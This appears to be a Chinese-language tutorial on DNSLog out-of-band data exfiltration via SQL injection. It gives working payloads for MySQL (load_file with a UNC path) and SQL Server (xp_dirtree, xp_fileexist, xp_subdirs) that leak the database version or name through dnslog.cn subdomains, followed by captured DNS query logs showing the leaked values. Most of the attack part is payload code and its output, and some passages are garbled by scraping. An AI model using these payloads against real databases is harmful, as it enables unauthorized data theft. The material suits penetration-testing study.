# 不同的数据库系统利用 dnslog 的姿势

## 一、Mysql

使用 load\_file

范例: windows 操作系统中的 mysql ,需要设置 secure\_file\_priv 为空,这个条件比较苛刻 select load\_file(concat('\\\',(select version()),'.2g7sst.dnslog.cn\\test'));

Windows 下 mysql 数据库管理系统中输入

### DNSLog 得到结果



### 二、SQL-Server

Microsoft SQL Server 使用如下存储过程 Master..xp\_dirtree (用于获取所有文件夹的列表和给定文件夹内部的子文件夹) master...xp\_fileexist (用于确定一个特定的文件是否存在于硬盘)

```
master...xp_subdirs (用于得到给定的文件夹内的文件夹列表)
master..xp_dirtree 'c:',1,1;
declare @a varchar(50);
select @a='\\'+convert(varchar(50),DB_NAME())+'.9fybol.dnslog.cn\abc';
print @a;
exec master..xp_dirtree @a,1,1;
```

```
SQUAREFYLS... (Sa (S3)):

| master..xp_dirtree 'c:',1,1;
| declare @a varchar(50);
| select @a='\\'+convert(varchar(50),DB_NAME())+'.9fybol.dnslog.cn\abc';
| print @a;
| exec master..xp_dirtree @a,1,1;
```

# DNSLog.cn

Get SubDomain Refresh Record

### 9fybol.dnslog.cn

DNS Query Record	IP Address	Created Time
master.9fybol.dnslog.cn	61.50.244.36	2022-09-20 15:45:03
master. 9 fybol. dnslog.cn	61.135.23.44	2022-09-20 15:45:03
master.9fybol.dnslog.cn	61.135.23.44	2022-09-20 15:45:03

declare @a varchar(50);

select @a='\\'+convert(varchar(50),DB\_NAME())+'.9fybol.dnslog.cn\test1';
print @a;

exec master..xp\_fileexist @a;

#### Get SubDomain Refresh Record 9fybol.dnslog.cn **DNS Query Record IP Address Created Time** master.9fybol.dnslog.cn 61.50.244.36 2022-09-20 15:56:13 master.9fybol.dnslog.cn 61.50.244.36 2022-09-20 15:45:03 master.9fybol.dnslog.cn 61.135.23.44 2022-09-20 15:45:03 master.9fybol.dnslog.cn 61.135.23.44 2022-09-20 15:45:03

```
declare @a varchar(50);
```

select @a='\\'+convert(varchar(50),db\_name())+'.u3tek5.dnslog.cn\demo';
print @a;

exec master..xp\_subdirs @a;

Get SubDomain Refresh Record

### u3tek5.dnslog.cn

DNS Query Record	IP Address	Created Time
master.u3tek5.dnslog.cn	61.50.244.38	2022-09-20 16:03:27
master.u3tek5.dnslog.cn	61.50.244.23	2022-09-20 16:03:22
master.u3tek5.dnslog.cn	61.50.244.40	2022-09-20 16:03:20
master.u3tek5.dnslog.cn	61.50.244.29	2022-09-20 16:03:20
master.u3tek5.dnslog.cn	61.50.244.26	2022-09-20 16:03:19
master.u3tek5.dnslog.cn	61.135.23.42	2022-09-20 16:03:18
master.u3tek5.dnslog.cn	61.50.244.36	2022-09-20 16:03:18
master.u3tek5.dnslog.cn	61.50.244.44	2022-09-20 16:03:17